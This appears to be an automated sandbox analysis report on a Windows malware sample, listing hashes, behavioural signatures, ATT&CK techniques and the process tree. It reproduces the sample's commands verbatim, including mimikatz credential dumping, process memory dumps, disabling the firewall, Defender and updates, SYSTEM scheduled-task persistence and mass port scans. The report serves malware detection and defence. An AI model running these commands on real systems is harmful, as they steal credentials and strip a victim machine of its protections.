Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
03/04/2025, 17:08
General
-
Target
2025-04-03_9fa48d38992bdc94ceb334c89d72dd86_amadey_cloudeye_hacktools_icedid_mimikatz_rhadamanthys_smoke-loader.exe
-
Size
17.8MB
-
MD5
9fa48d38992bdc94ceb334c89d72dd86
-
SHA1
b0899fba19c87e009bff6f89e32bafae3d6e0681
-
SHA256
cf77651324150325d06c03f9176e51b92763fc91b83840a1f81b34946526524c
-
SHA512
1a3d755c1da555f306b41ff5491fd038e99c5f9f05e374f9fb2b444bf5db330f5adea4559064fd83837f0a44b2a202cd34752adbc2ca2960ee402cd0d5cb84ad
-
SSDEEP
196608:I6mknGzwHdOgEPHd9BbX/nivPlTXTYrE6mknGzwHdOgEPHd9BbX/nivPlTXTYr:Sjz0EJ7/iv1Vjz0EJ7/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (28530) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 31 IoCs
-
Loads dropped DLL 12 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
UPX packed file 37 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 59 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 11 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\eeqblllmv\hplfju.exe"C:\Windows\TEMP\eeqblllmv\hplfju.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2025-04-03_9fa48d38992bdc94ceb334c89d72dd86_amadey_cloudeye_hacktools_icedid_mimikatz_rhadamanthys_smoke-loader.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-03_9fa48d38992bdc94ceb334c89d72dd86_amadey_cloudeye_hacktools_icedid_mimikatz_rhadamanthys_smoke-loader.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ylybunzr\branegt.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\ylybunzr\branegt.exeC:\Windows\ylybunzr\branegt.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\ylybunzr\branegt.exeC:\Windows\ylybunzr\branegt.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ylphdetvt\ybbniztkb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\ylphdetvt\ybbniztkb\wpcap.exeC:\Windows\ylphdetvt\ybbniztkb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ylphdetvt\ybbniztkb\puellhpnz.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\ylphdetvt\ybbniztkb\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\ylphdetvt\ybbniztkb\puellhpnz.exeC:\Windows\ylphdetvt\ybbniztkb\puellhpnz.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\ylphdetvt\ybbniztkb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\ylphdetvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\ylphdetvt\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\ylphdetvt\Corporate\vfshost.exeC:\Windows\ylphdetvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gtynenyzi" /ru system /tr "cmd /c C:\Windows\ime\branegt.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gtynenyzi" /ru system /tr "cmd /c C:\Windows\ime\branegt.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "rnblyvngt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ylybunzr\branegt.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "rnblyvngt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ylybunzr\branegt.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kreqlkkni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eeqblllmv\hplfju.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "kreqlkkni" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\eeqblllmv\hplfju.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 796 C:\Windows\TEMP\ylphdetvt\796.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 332 C:\Windows\TEMP\ylphdetvt\332.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 2116 C:\Windows\TEMP\ylphdetvt\2116.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 2656 C:\Windows\TEMP\ylphdetvt\2656.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 2772 C:\Windows\TEMP\ylphdetvt\2772.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 2872 C:\Windows\TEMP\ylphdetvt\2872.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 2172 C:\Windows\TEMP\ylphdetvt\2172.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 3732 C:\Windows\TEMP\ylphdetvt\3732.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 3832 C:\Windows\TEMP\ylphdetvt\3832.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 3892 C:\Windows\TEMP\ylphdetvt\3892.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 4020 C:\Windows\TEMP\ylphdetvt\4020.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 3880 C:\Windows\TEMP\ylphdetvt\3880.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 380 C:\Windows\TEMP\ylphdetvt\380.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 784 C:\Windows\TEMP\ylphdetvt\784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 2036 C:\Windows\TEMP\ylphdetvt\2036.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 3096 C:\Windows\TEMP\ylphdetvt\3096.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 1308 C:\Windows\TEMP\ylphdetvt\1308.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exeC:\Windows\TEMP\ylphdetvt\vlnlgrhbm.exe -accepteula -mp 4548 C:\Windows\TEMP\ylphdetvt\4548.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\ylphdetvt\ybbniztkb\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\ylphdetvt\ybbniztkb\ienepbmlg.exeienepbmlg.exe TCP 212.102.0.1 7001 512 /save3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Windows\ylphdetvt\ybbniztkb\ienepbmlg.exeienepbmlg.exe TCP 212.102.255.255 7001 512 /save3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Windows\ylphdetvt\ybbniztkb\ienepbmlg.exeienepbmlg.exe TCP 142.133.0.1 142.133.255.255 7001 512 /save3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\joxnkm.exeC:\Windows\SysWOW64\joxnkm.exe1⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\branegt.exe1⤵
-
C:\Windows\ime\branegt.exeC:\Windows\ime\branegt.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ylybunzr\branegt.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\ylybunzr\branegt.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\eeqblllmv\hplfju.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\eeqblllmv\hplfju.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\branegt.exe1⤵
-
C:\Windows\ime\branegt.exeC:\Windows\ime\branegt.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ylybunzr\branegt.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\ylybunzr\branegt.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\eeqblllmv\hplfju.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\eeqblllmv\hplfju.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
